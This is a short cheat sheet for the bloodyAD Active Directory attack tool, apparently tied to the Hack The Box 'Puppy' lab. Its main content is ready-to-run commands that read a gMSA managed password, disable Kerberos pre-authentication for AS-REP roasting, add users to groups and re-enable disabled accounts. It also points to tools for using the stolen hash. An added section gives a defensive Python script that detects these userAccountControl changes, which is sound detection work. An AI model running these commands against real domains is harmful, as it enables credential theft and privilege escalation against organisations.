CheatSheet

bloodyAD

 

1.0 Installation

git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD
python -m venv .venv
source .venv/bin/activate
pip install .

2.0 Configuration

3.0 Usage

3.1 Attacking GMSA Accounts

bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k get object 'GMSA01$' --attr msDS-ManagedPassword

You can use the NTLM hash to obtain a TGT with impacket-getTGT.

3.2 Make User ASRepRoastable

bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add uac $targetuser -f DONT_REQ_PREAUTH

You can AS-REP roast the user with netexec --asreproast or impacket-GetNPUsers.

3.3 Add user to group

bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add groupMember 'targetgroup' 'usertoadd'

3.4 Activate account

bloodyAD --host dc.domain.local --dc-ip $dcip -d domain.local -k remove uac 'UserToActivate' -f ACCOUNTDISABLE
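Added example (not part of the original cheat sheet or of bloodyAD): a defender-side check for the flag changes in 3.2 and 3.4. It diffs two userAccountControl exports and reports accounts where DONT_REQ_PREAUTH was set or ACCOUNTDISABLE was cleared; the CSV export format, the account names and the function names are assumptions constructed for illustration.

```python
# Added example: diff two userAccountControl exports (constructed sample data).
ACCOUNTDISABLE = 0x0002        # documented userAccountControl bit
DONT_REQ_PREAUTH = 0x400000    # documented userAccountControl bit

# Constructed exports, one "sAMAccountName,userAccountControl" pair per line.
BEFORE_CSV = """alice,512
svc_backup,514
bob,66048"""
AFTER_CSV = """alice,4194816
svc_backup,512
bob,66048
carol,4194816"""


def parse_export(text):
    """Parse the assumed CSV export into {account: userAccountControl}."""
    snapshot = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comment lines
        name, value = line.rsplit(",", 1)
        snapshot[name.strip().lower()] = int(value, 0)  # accepts 512 or 0x200
    return snapshot


def uac_findings(before, after):
    """Return sorted (account, finding) tuples for risky flag transitions."""
    findings = []
    for account, new in after.items():
        old = before.get(account)
        if old is None:
            # Account absent from the baseline: report it if pre-auth is off.
            if new & DONT_REQ_PREAUTH:
                findings.append((account, "new account without pre-authentication"))
            continue
        if (new & ~old) & DONT_REQ_PREAUTH:   # bit newly set (section 3.2)
            findings.append((account, "DONT_REQ_PREAUTH set"))
        if (old & ~new) & ACCOUNTDISABLE:     # bit newly cleared (section 3.4)
            findings.append((account, "ACCOUNTDISABLE cleared"))
    return sorted(findings)


if __name__ == "__main__":
    results = uac_findings(parse_export(BEFORE_CSV), parse_export(AFTER_CSV))
    for account, finding in results:
        print(f"{account}: {finding}")
```

On a domain controller with account-management auditing enabled, the same transitions appear as Security event 4738 (user account changed) and 4722 (user account enabled).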

4.0 Hints

5.0 References

HTB-Puppy